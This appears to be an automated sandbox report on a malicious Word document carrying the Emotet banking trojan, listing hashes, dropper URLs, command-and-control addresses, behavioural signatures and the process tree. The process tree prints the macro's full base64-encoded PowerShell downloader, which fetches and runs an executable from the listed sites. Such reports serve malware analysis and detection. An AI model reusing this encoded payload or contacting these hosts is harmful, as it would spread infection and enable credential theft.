Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    60s
  • max time network
    67s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-07-2020 04:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9affebf9743a24814684c2e6b915db97652fbebf374ce6847c90b555b2df48d0.doc

  • Size

    191KB

  • MD5

    6e2ac9b14dfc0056e26643a7f77a3fa5

  • SHA1

    14bfcd24dfc0986a7434fefb444f5a140de6cec6

  • SHA256

    9affebf9743a24814684c2e6b915db97652fbebf374ce6847c90b555b2df48d0

  • SHA512

    36807474507062a90e279b64925bef3414a599efbc2cf63aea4b6f77f45f2290a7ebb2e93ba33d4dfb091487fdcf58b7e7afa5d7cd00e8c0841f7f8e7e102060

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/
exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/
exe.dropper

https://www.angage.com/wp-content/mtincvc/
exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/
exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080
rsa_pubkey.plain

Signatures

  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9affebf9743a24814684c2e6b915db97652fbebf374ce6847c90b555b2df48d0.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1292
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAFIATwB0AG8AYABDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAGoAYQBvAHQAaABwAGEAbwB0AGgAIAA9ACAAJwA4ADcAMAAnADsAJABsAG8AdQBxAHUAPQAnAGIAbwBvAHkAdwBlAGUAagBuAGUAYQBsAGsAZQBvAHYAJwA7ACQAZAB1AGIAawBlAG8AawBwAGkAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBhAG8AdABoAHAAYQBvAHQAaAArACcALgBlAHgAZQAnADsAJAB0AG8AYQB4AG4AbwBpAHIAZgBpAGUAdABzAG8AdQBuAHMAaQBxAHUAPQAnAHgAbwBlAHEAdQBuAG8AbwBsACcAOwAkAGMAdQBhAHQAaABjAGkAbwB5AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABjAGUAZQB4AHQAaABhAHUAYwBoAGgAZQBpAGYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADIAMAAxADkAMAA2ADAANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQB4AHkAagBvAHoAcwAvACoAaAB0AHQAcABzADoALwAvAGwAbwB2AGUAbAB5AC0AbABvAGwAbABpAGUAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgBnAHYAaQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAG4AZwBhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0AdABpAG4AYwB2AGMALwAqAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0AC0AcABsAHUAcwAuAGMAbwAuAHUAawAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwAzAHkAZQB5ADMAcgByAC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGEAcwAuAGgAbwBvAG4AaQBjAG8AcgBuAHMALgBwAHQALwBjAG8AbQBwADMALwBsAHkAOABjAG0AdABpAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABxAHUAaQBoAGoAbwB1AGYAagBlAGUAcABsAG8AbwBmAG0AZQBvAHYAPQAnAGwAbwBpAHQAaABtAGEAaQBjAGgAagBvAG8AZgBuAGEAZQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB5AGUAZQB5AG4AbwBvAGIAbgBpAG8AawBnAGkAbwBoAHgAdQByAHoAYQBpAHAAIABpAG4AIAAkAGMAZQBlAHgAdABoAGEAdQBjAGgAaABlAGkAZgApAHsAdAByAHkAewAkAGMAdQBhAHQAaABjAGkAbwB5AC4AIgBEAG8AVwBOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAeQBlAGUAeQBuAG8AbwBiAG4AaQBvAGsAZwBpAG8AaAB4AHUAcgB6AGEAaQBwACwAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQA7ACQAcgBhAGUAcQB1AGgAdQBhAHgAbABpAGEAagBqAGUAaQBrAD0AJwBtAGUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQAuACIATABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADYAOAA4ADcAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQB0AEUAIgAoACQAZAB1AGIAawBlAG8AawBwAGkAcAApADsAJABzAGkAZQBjAGgAaQBlAHQAYwBoAHUAYQBuAGMAbwBpAGwAZABlAGUAYwBoAHQAdQBhAGMAaAA9ACcAdABoAG8AdQBuACcAOwBiAHIAZQBhAGsAOwAkAGsAdQB1AGMAcABlAGEAZABmAGUAbwBnAGQAYQBlAHoAcwBlAHUAagA9ACcAcwBhAGsAbgBpAG8AcgBnAHUAegByAGkAbwBnAG4AdQB1AHoAYwBvAHQAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGUAdQBmAHIAbwBvAGsAcgBpAGEAagB0AGgAZQB1AGwAYwBpAGUAYgA9ACcAegBpAGEAcQB1AGMAbwBlAHgAdABoAGkAZQB6AG0AdQB1AGMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    PID:1044
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1764
    • C:\Windows\SysWOW64\wiaacmgr\wow32.exe
      "C:\Windows\SysWOW64\wiaacmgr\wow32.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1208

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1208-12-0x0000000000360000-0x000000000036C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1292-2-0x00000000088C0000-0x00000000088C4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-3-0x0000000006DA0000-0x0000000006FA0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1292-4-0x0000000006DA0000-0x0000000006FA0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1292-5-0x000000000AB80000-0x000000000AB84000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-6-0x000000000BC00000-0x000000000BC04000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1764-9-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB

    Download